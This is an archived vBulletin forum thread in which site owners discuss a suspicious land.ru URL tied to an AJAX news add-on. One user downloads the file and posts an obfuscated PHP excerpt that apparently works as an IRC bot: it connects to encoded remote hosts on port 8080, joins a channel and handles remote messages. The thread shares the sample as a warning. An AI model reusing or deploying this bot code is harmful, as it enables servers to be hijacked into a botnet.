vb.org Archive
Page 9 of 9 « First 78 9
Show 40 post(s) from this thread on one page

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   vBulletin 3.6 Add-ons (https://vborg.vbsupport.ru/forumdisplay.php?f=194)
-   -   Miscellaneous Hacks - [AJAX] News/Announcements (https://vborg.vbsupport.ru/showthread.php?t=144414)

kylek 01-02-2008 05:29 PM
Now getting other script addresses in the database error:

http://www.xxxxx.xxx/forum/showthrea...ru/.html/body?

Same error different email in script:

http://www.xxxxxxx.xxx/forum/showthr.../.cache/index?

Uninstalling until this can be explained.

Ulf T 01-03-2008 10:35 PM
Quote:
Originally Posted by kylek (Post 1413960)
Still getting the same database error over and over, anyone else getting this?
Also what is the second address in the script? This - http://joioiskioeriyyskwkdwjsdfewis.land.ru/.html/body has nothing to do with our site.
I really don't know what it is. I just thought i would let you know i?ve also seen this address:

http://img217.imageshack.us/img217/7...ctivityyl9.png

I haven?t installed this AJAX News hack, so i doubt that could have anything to do with it. But i maybe missunderstand you. Do you think the hack could be the reason why this strange url gives you database errors? Because i don?t get any database errors. I just see this address coming up in the activity list.

Ulf T 01-04-2008 09:43 AM
I tried the url, and downloaded the file "body". I have a mac, so i think it was fairly safe for me. I found a script inside it. It?s too obfuscated for me to find out what it?s doing. But i presume it?s something evil. Here is a part of the beginning:
Code:
<? set_time_limit(0); ini_set("max_execution_time",0); set_magic_quotes_runtime(0); ini_set('output_buffering',0); error_reporting(0); ignore_user_abort();
$aec12e0af93cb5 = array ( "po" => 8080, "sp" => "uJijk4iVsIXRmQ==", "ch" => "aFaw", "ke" => "spd1iYSUqA==", "ha" => "dG1qQk1halK/nE6N", "pa" =>
"fpekVYhVdlWQXGLBXnBWWId1hll1WVWJVFpYh1tahVs=", "tr" => "*", "mrnd" => 9, "mo" => "cqtrig==", "ve" => "dmFyWA==" ); function tc8a89c2c306fb($m341be97d9aff9) {
$m341be97d9aff9 = str_replace(" ", "", $m341be97d9aff9); return $m341be97d9aff9; } function ob5d21085bf2c0($m341be97d9aff9) { $m341be97d9aff9 =
base64_decode(tc8a89c2c306fb($m341be97d9aff9)); return $m341be97d9aff9; } function rfc35fdc70d5fc() { global $aec12e0af93cb5; $see11cbb19052e = array();
$td707b8140a662 = ""; $b59b514174bffe =
array("sqytlpaKo4a/lI6MnaWIiI+zUYSvkA==","sqywiZKPpZLTk4zDmG6aiYakkZRuhpCR","rpihlYyTr5LWVKHDi6SRl0+jko4=","rZytgpFPr5TDlI7MmW6FiQ==","sKJuhYdPopDTi5bHlKVRhoY=","tWeuVFZSclfDVI7CVKKPmYasjI+lUYOJ","vaOokJFUbpPOi5jClLNRhoY=","sqywiZKPpVeMipjHlm6RiZU=","sqytlpaKo5eMipjHlm6RiZU=");
shuffle($b59b514174bffe); if(($j351a1d2ad68bc = fsockopen(jf9feaa9bcab30($b59b514174bffe[0]),$aec12e0af93cb5['po'],$k70106d0d82151,$d809b1abe3f111,15))) {
$m8052146769b14 = ad988971435842($aec12e0af93cb5['mrnd']); if (strlen($aec12e0af93cb5['sp'])>0) { q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("UEFTUw==")."
".jf9feaa9bcab30($aec12e0af93cb5['sp'])); } q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("VVNFUg==")." ".gfb0daa8f01135($aec12e0af93cb5['mrnd'])." 127.0.0.1
localhost :$m8052146769b14"); q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("TklDSw==")." $m8052146769b14"); while (!feof($j351a1d2ad68bc)) { $f7fabc1404929c
= trim(fgets($j351a1d2ad68bc,512)); $h6e2baaf3b97db = explode(" ",$f7fabc1404929c); if(($f7fabc1404929c == $td707b8140a662)) continue; if
(isset($h6e2baaf3b97db[0]) && $h6e2baaf3b97db[0] == ob5d21085bf2c0("UElORw==")) { q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("UE9ORw==")."
".$h6e2baaf3b97db[1]); } else if (isset($h6e2baaf3b97db[1]) && $h6e2baaf3b97db[1] == ob5d21085bf2c0("MDAx")) { q56eacb300613d($j351a1d2ad68bc,
ob5d21085bf2c0("TU9ERQ==")." $m8052146769b14 ".jf9feaa9bcab30($aec12e0af93cb5['mo'])); q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("Sk9JTg==")."
".jf9feaa9bcab30($aec12e0af93cb5['ch'])." ".jf9feaa9bcab30($aec12e0af93cb5['ke'])); } else if(isset($zdfff0a7fa1a55[1]) && $zdfff0a7fa1a55[1] ==
ob5d21085bf2c0("NDMz")) { q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("TklDSw==")." $m8052146769b14"); } else if (isset($h6e2baaf3b97db[1]) &&
isset($see11cbb19052e[$h6e2baaf3b97db[1]])) { unset($see11cbb19052e[$h6e2baaf3b97db[1]]); } else if (isset($h6e2baaf3b97db[1]) && ($h6e2baaf3b97db[1] ==
ob5d21085bf2c0("UFJJVk1TRw==") || $h6e2baaf3b97db[1] == "332")) { $n78e731027d8fd = strstr($f7fabc1404929c," :"); $n78e731027d8fd = substr($n78e731027d8fd,2);
$zdfff0a7fa1a55 = explode(" ",$n78e731027d8fd); $m67b3dba8bc677 = $h6e2baaf3b97db[0]; $v7c6483ddcd99e = explode("!",$m67b3dba8bc677); $v7c6483ddcd99e =
substr($v7c6483ddcd99e[0],1); $d73be252ca8221 = FALSE; if ($zdfff0a7fa1a55[0] == "\1".ob5d21085bf2c0("VkVSU0lPTg==")."\1") {
My guess is that they try to spread this link in order to trick people into downloading and executing this code.

VADOS 01-05-2008 06:49 AM
Unistalled.


All times are GMT. The time now is 02:58 PM.
Page 9 of 9 « First 78 9
Show 40 post(s) from this thread on one page

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.

X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.01099 seconds
  • Memory Usage 1,737KB
  • Queries Executed 10 (?)
More Information
Template Usage:
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)bbcode_code_printable
  • (1)bbcode_quote_printable
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)pagenav
  • (1)pagenav_curpage
  • (2)pagenav_pagelink
  • (1)post_thanks_navbar_search
  • (1)printthread
  • (4)printthreadbit
  • (1)spacer_close
  • (1)spacer_open 
Phrase Groups Available:
  • global
  • postbit
  • showthread
Included Files:
  • ./printthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/class_bbcode_alt.php
  • ./includes/class_bbcode.php
  • ./includes/functions_bigthree.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • printthread_start
  • pagenav_page
  • pagenav_complete
  • bbcode_fetch_tags
  • bbcode_create
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • printthread_post
  • printthread_complete